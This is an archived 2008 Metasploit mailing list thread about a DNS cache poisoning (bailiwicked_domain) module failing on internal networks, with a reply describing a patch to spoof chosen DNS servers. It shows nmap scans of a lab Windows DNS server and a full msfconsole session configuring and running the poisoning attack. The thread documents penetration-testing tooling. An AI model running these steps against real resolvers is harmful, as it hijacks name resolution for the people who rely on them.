Metasploit mailing list archives

DNS cache poisoning difficulty

From: natron at invisibledenizen.org (natron)
Date: Tue, 29 Jul 2008 18:35:40 -0500

I gave a shot at implementing this and I believe it works.  You now
have an optional variable where you can set the DNS servers
arbitrarily.  When set, it'll skip the authoritative checks and only
use your DNS server list.  You'd probably only want to use this if you
were internal.  An example scenario would be:

client --> AD server --> authoritative company DNS resolver -->
internet DNS servers

This would be for attacking "AD server" when you know "authoritative
company DNS resolver" as well as the "AD Server" source port used to
communicate with the resolver.

I've also found that when doing an nmap -sU -sV scan against an AD DNS
server, the port AD is using to forward is returning junk nmap doesn't
know what to do with (well, at least my version of nmap -- i didn't
try an upgrade).  See the examples below.  You'll notice that the
first scan is jibberish, but scans 2 - 4 all contain the string
"root-servers".  FYI, this is running against Windows 2003 under
VMWare ESX (obviously without MS08-037 applied).

Please test this, someone, to see if it's working properly in your
environment.  It looks like it's working correctly when I monitor it
in wireshark, but I've been unsuccessful in poisoning the local cache.
 I believe this to be a combination of the short race time on a LAN
and my inherent impatience.

Bugs: I don't believe the racer functionality is working for some
reason; I'm not sure what I broke.  I have to set it the XIDS manual
or it loops on the racer check.

Nathan

Example:

[root at localhost dns]# nmap -sU -sV -p- 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:25 CDT
Interesting ports on 172.16.1.251:
Not shown: 65519 closed ports
PORT     STATE         SERVICE      VERSION
53/udp   open          domain       Microsoft DNS
88/udp   open|filtered kerberos-sec
123/udp  open          ntp          NTP v3
137/udp  open          netbios-ns   Microsoft Windows NT netbios-ssn
(workgroup: xxxxxxxx)
138/udp  open|filtered netbios-dgm
389/udp  open|filtered ldap
445/udp  open|filtered microsoft-ds
464/udp  open|filtered kpasswd5
500/udp  open|filtered isakmp
1029/udp open|filtered unknown
1033/udp open          unknown
1218/udp open|filtered unknown
1225/udp open|filtered unknown
1234/udp open|filtered unknown
1434/udp open          ms-sql-m     Microsoft SQL Server 8.00.194
(ServerName: xxxx; TCPPort: xxxx)
4500/udp open|filtered sae-urn
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE8CB%P=i686-pc-linux-gnu%r(NBTS
SF:tat,1E1,"\x80\xf0\x80\x80\0\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAA\0\0!\0\x01\0\0\x02\0\x01\0\x01F<\0\x14\x01a\x0croot-servers\x0
SF:3net\0\xc02\0\x02\0\x01\0\x01F<\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01
SF:F<\0\x04\x01c\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01d\xc0\?\xc02\0\x0
SF:2\0\x01\0\x01F<\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01f\xc
SF:0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01F<\
SF:0\x04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01F<\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x04\x01k\xc0\?
SF:\xc02\0\x02\0\x01\0\x01F<\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\x01F<\0\x
SF:04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01F<\0\x04\xc6\)\0\x04\xc0\]\0\x01\0\
SF:x01\0\x01F<\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01F<\0\x04\xc0!\x04\
SF:x0c\xc0}\0\x01\0\x01\0\x01F<\0\x04\x80\x08\nZ\xc0\x8d\0\x01\0\x01\0\x01
SF:F<\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0\x01F<\0\x04\xc0\x05\x05\xf
SF:1\xc0\xad\0\x01\0\x01\0\x01F<\0\x04\xc0p\$\x04\xc0\xbd\0\x01\0\x01\0\x0
SF:1FB\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x01\0\x01F<\0\x04\xc0\$\x94\x11\xc
SF:0\xdd\0\x01\0\x01\0\x01F<\0\x04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01F
SF:<\0\x04\xc1\0\x0e\x81\xc0\xfd\0\x01\0\x01\0\x01F<\0\x04\xc7\x07S\*\xc1\
SF:r\0\x01\0\x01\0\x01F<\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)
Service Info: Host: ZEUS; OS: Windows

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.822 seconds
[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:27 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DE94A%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01E\xaf\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01E\xaf\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01E\
SF:xaf\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01E\xaf\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01E\xaf\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01E\xaf\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01E\xaf\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01E\xaf\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:E\xaf\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01E\xaf\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01E\xaf\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01E\xaf\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01E\xaf\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01E\xb5\0\x04\x80\?\x025\xc0\xcd\0\x01\
SF:0\x01\0\x01E\xaf\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01E\xaf\0\x
SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01E\xaf\0\x04\xc1\0\x0e\x81\xc0\
SF:xfd\0\x01\0\x01\0\x01E\xaf\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01E\xa
SF:f\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:40 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DEC45%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01B\xb4\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01B\xb4\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\
SF:xb4\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01B\xb4\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01B\xb4\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\xb4\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01B\xb4\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\xb4\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:B\xb4\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\xb4\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01B\xb4\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01B\xb4\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\xb4\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B\xba\0\x04\x80\?\x025\xc0\xcd\0\x01\
SF:0\x01\0\x01B\xb4\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\xb4\0\x
SF:04\xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\xb4\0\x04\xc1\0\x0e\x81\xc0\
SF:xfd\0\x01\0\x01\0\x01B\xb4\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\xb
SF:4\0\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.617 seconds

[root at localhost dns]# nmap -sU -sV -p1033 172.16.1.251

Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-16 07:43 CDT
Interesting ports on 172.16.1.251:
PORT     STATE SERVICE VERSION
1033/udp open  unknown
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port1033-UDP:V=4.68%I=7%D=7/16%Time=487DECDA%P=i686-pc-linux-gnu%r(RPCC
SF:heck,28,"r\xfe\x9d\x04\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(NBTStat,1E1,"\x80\xf0\x80\x80\0
SF:\x01\0\0\0\r\0\r\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01\0\0\x02
SF:\0\x01\0\x01B\x1f\0\x14\x01a\x0croot-servers\x03net\0\xc02\0\x02\0\x01\
SF:0\x01B\x1f\0\x04\x01b\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01c\xc0\
SF:?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01d\xc0\?\xc02\0\x02\0\x01\0\x01B\
SF:x1f\0\x04\x01e\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01f\xc0\?\xc02\
SF:0\x02\0\x01\0\x01B\x1f\0\x04\x01g\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x
SF:04\x01h\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01i\xc0\?\xc02\0\x02\0
SF:\x01\0\x01B\x1f\0\x04\x01j\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01k
SF:\xc0\?\xc02\0\x02\0\x01\0\x01B\x1f\0\x04\x01l\xc0\?\xc02\0\x02\0\x01\0\
SF:x01B\x1f\0\x04\x01m\xc0\?\xc0=\0\x01\0\x01\0\x01B\x1f\0\x04\xc6\)\0\x04
SF:\xc0\]\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xe4O\xc9\xc0m\0\x01\0\x01\0\x01
SF:B\x1f\0\x04\xc0!\x04\x0c\xc0}\0\x01\0\x01\0\x01B\x1f\0\x04\x80\x08\nZ\x
SF:c0\x8d\0\x01\0\x01\0\x01B\x1f\0\x04\xc0\xcb\xe6\n\xc0\x9d\0\x01\0\x01\0
SF:\x01B\x1f\0\x04\xc0\x05\x05\xf1\xc0\xad\0\x01\0\x01\0\x01B\x1f\0\x04\xc
SF:0p\$\x04\xc0\xbd\0\x01\0\x01\0\x01B%\0\x04\x80\?\x025\xc0\xcd\0\x01\0\x
SF:01\0\x01B\x1f\0\x04\xc0\$\x94\x11\xc0\xdd\0\x01\0\x01\0\x01B\x1f\0\x04\
SF:xc0:\x80\x1e\xc0\xed\0\x01\0\x01\0\x01B\x1f\0\x04\xc1\0\x0e\x81\xc0\xfd
SF:\0\x01\0\x01\0\x01B\x1f\0\x04\xc7\x07S\*\xc1\r\0\x01\0\x01\0\x01B\x1f\0
SF:\x04\xca\x0c\x1b!");
MAC Address: 00:0C:29:A7:D4:3C (VMware)

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.623 seconds

[root at localhost msf-dev]# ./msfconsole

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|


       =[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 68 aux

msf auxiliary(bailiwicked_domain) > set DOMAIN invisibledenizen.org
DOMAIN => invisibledenizen.org
msf auxiliary(bailiwicked_domain) > set SRCPORT 1033
SRCPORT => 1033
msf auxiliary(bailiwicked_domain) > set SRCDNS "172.16.1.1, 10.10.10.10"
SRCDNS => 172.16.1.1, 10.10.10.10
msf auxiliary(bailiwicked_domain) > set SRCDNS 172.16.1.1
SRCDNS => 172.16.1.1
msf auxiliary(bailiwicked_domain) > set XIDS 20
XIDS => 20
msf auxiliary(bailiwicked_domain) > set NEWDNS fakedns.visibledenizens.org
NEWDNS => fakedns.visibledenizens.org
msf auxiliary(bailiwicked_domain) > show options

Module options:

   Name     Current Setting              Required  Description
   ----     ---------------              --------  -----------
   DOMAIN   invisibledenizen.org         yes       The domain to hijack
   NEWDNS   fakedns.visibledenizens.org  yes       The hostname of the
replacement DNS server
   RECONS   208.67.222.222               yes       The nameserver used
for reconnaissance
   RHOST    172.16.1.251                 yes       The target address
   SRCADDR  Real                         yes       The source address
to use for sending the queries (accepted: Real, Random)
   SRCDNS   172.16.1.1                   no        An optional list of
DNS servers to spoof as ("10.1.1.1, 10.2.2.2" format)
   SRCPORT  1033                         yes       The target server's
source query port (0 for automatic)
   TTL      34282                        yes       The TTL for the
malicious host entry
   XIDS     20                           yes       The number of XIDs
to try for each query (0 for automatic)

msf auxiliary(bailiwicked_domain) > save
Saved configuration to: /root/.msf3/config
msf auxiliary(bailiwicked_domain) > run
[*] Targeting nameserver 172.16.1.251 for injection of
invisibledenizen.org. nameservers as fakedns.visibledenizens.org
[*] Added 172.16.1.1 into list of domains to spoof as.
[*] Attempting to inject poison records for invisibledenizen.org.'s
nameservers into 172.16.1.251:1033...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...

On Tue, Jul 29, 2008 at 2:21 PM, H D Moore <hdm at metasploit.com> wrote:


With your setup, the exploits won't work. You could modify the exploit
locally, remove the authoritative checks, and hardcode barbs =
[ "ip1", "ip2", "ip3"]. Alternatively, add a new option to specify the
list of nameservers to spoof and submit the patch :-)

On Tuesday 29 July 2008, Sat Jagat Singh wrote:

In testing the spoof/dns/bailiwicked_host (and also bailiwicked_domain)
modules on an internal penetration test I have encountered a challenge
with firewall filtering of egress to external DNS servers.  Let me be
clear, I am on the LAN.  DNS traffic is not permitted out to the
internet except from the organization's own internal DNS servers that
perform recursive queries for internal users.

Metasploit gets to a point where it attempts to query yahoo's
nameserver for authoritativeness and just hangs since the traffic gets
dropped at the firewall.

Any suggestions?



_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework

-------------- next part --------------
A non-text attachment was scrubbed...
Name: bailiwicked_domain.patch
Type: text/x-diff
Size: 5119 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080729/8f45326e/attachment.patch>

Current thread:

DNS cache poisoning difficulty Sat Jagat Singh (Jul 29)
- DNS cache poisoning difficulty H D Moore (Jul 29)
  - DNS cache poisoning difficulty Jefferson, Shawn (Jul 29)
    - DNS cache poisoning difficulty H D Moore (Jul 29)
  - DNS cache poisoning difficulty natron (Jul 29)